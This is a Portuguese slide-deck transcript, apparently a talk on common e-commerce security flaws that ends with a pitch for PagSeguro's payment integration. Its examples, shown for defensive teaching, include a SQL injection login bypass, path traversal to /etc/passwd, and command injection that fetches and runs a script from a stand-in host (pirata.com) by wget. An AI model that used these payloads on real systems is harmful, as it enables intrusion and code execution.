e-commerce seguro com pagseguro

41
e-Commerce seguro com PagSeguro

Upload: elcio-ferreira

Post on 05-Dec-2014

2.748 views

Category:

Technology


3 download

DESCRIPTION

Conheça as falhas de segurança mais comuns em comércio eletrônico, entenda como proteger seu e-commerce de invasores e fraudadores e saiba como PagSeguro pode ajudar a tornar sua loja virtual segura.

TRANSCRIPT

Page 1: E-commerce seguro com PagSeguro

e­Commerce seguro com PagSeguro

Page 2: E-commerce seguro com PagSeguro

medo

Page 3: E-commerce seguro com PagSeguro

OWASPowasp.org

Page 4: E-commerce seguro com PagSeguro

Segurança em todo o processo

Page 5: E-commerce seguro com PagSeguro

Sistema atualizado

Page 6: E-commerce seguro com PagSeguro

Portas fechadas  

Page 7: E-commerce seguro com PagSeguro

Senhas seguras

Page 8: E-commerce seguro com PagSeguro

SSL

Page 9: E-commerce seguro com PagSeguro

Falhas na aplicação

Page 10: E-commerce seguro com PagSeguro

SQL Injection

Page 11: E-commerce seguro com PagSeguro

<?q = db.exec("SELECT * FROM user WHERE login='%s' AND senha='%s'" % (login,senha))?>

Page 12: E-commerce seguro com PagSeguro

<?q = db.exec("SELECT * FROM user WHERE login='%s' AND senha='%s'" % (login,senha))?>

login: adminsenha: ' OR '1'='1

Page 13: E-commerce seguro com PagSeguro

<?q = db.exec("SELECT * FROM user WHERE login='%s' AND senha='%s'" % (login,senha))?>

login: adminsenha: ' OR '1'='1

SELECT * FROM user WHERE login='admin' AND senha='' OR '1'='1'

Page 14: E-commerce seguro com PagSeguro

Falsificação de Identidade

Page 15: E-commerce seguro com PagSeguro
Page 16: E-commerce seguro com PagSeguro

Controles no Client

Page 17: E-commerce seguro com PagSeguro

<input type="hidden" name="desconto" value="10,00" />

Page 18: E-commerce seguro com PagSeguro

Quebra de Fluxo

Page 19: E-commerce seguro com PagSeguro

http://seusite.com/compra.php?passo=1

Page 20: E-commerce seguro com PagSeguro

Ataques contra outros clients

Page 21: E-commerce seguro com PagSeguro

HTML Injection

Page 22: E-commerce seguro com PagSeguro

Script Injection

Page 23: E-commerce seguro com PagSeguro

XSS

Page 24: E-commerce seguro com PagSeguro

XSRF

Page 25: E-commerce seguro com PagSeguro

Exposição de recursos

Page 26: E-commerce seguro com PagSeguro

http://seusite.com/compra.php?passo=1 &stop=1&template=azul.php

Page 27: E-commerce seguro com PagSeguro

http://seusite.com/compra.php?passo=1 &stop=1&template=azul.php

http://seusite.com/compra.php?passo=1 &stop=1&template=../../etc/passwd

Page 28: E-commerce seguro com PagSeguro

Execução de recursos

Page 29: E-commerce seguro com PagSeguro

http://seusite.com/relatorio.php?tipo=3&gerador=pdfmaker

Page 30: E-commerce seguro com PagSeguro

http://seusite.com/relatorio.php?tipo=3&gerador=pdfmaker

http://seusite.com/relatorio.php?tipo=3&gerador=wget+pirata.com/script

http://seusite.com/relatorio.php?tipo=3&gerador=sh+script

Page 31: E-commerce seguro com PagSeguro

Autenticação falha

Page 32: E-commerce seguro com PagSeguro

Criptografia insegura

Page 33: E-commerce seguro com PagSeguro

Falha de restrição de acesso

Page 34: E-commerce seguro com PagSeguro

Denial Of Service

Page 35: E-commerce seguro com PagSeguro

Pagamento: processo crítico

Page 36: E-commerce seguro com PagSeguro

PagSeguro

Page 37: E-commerce seguro com PagSeguro

PagSeguro:­ Uma única implantação

­ Segurança contra chargeback/fraude

­ EVSSL + Aplicação segura

Page 38: E-commerce seguro com PagSeguro

Formas de implantação:­ Carrinho PagSeguro

­ Carrinho Próprio­ Retorno Automático

Page 39: E-commerce seguro com PagSeguro

Pontos sensíveis:­ HTML do Form de Carrinho

­ URL de Retorno

Page 40: E-commerce seguro com PagSeguro

Proteja sua URL de Retorno:­ Valide com o Token

­ Valide os Valores­ Log

­ Fique alerta!

Page 41: E-commerce seguro com PagSeguro

Obrigado!

[email protected]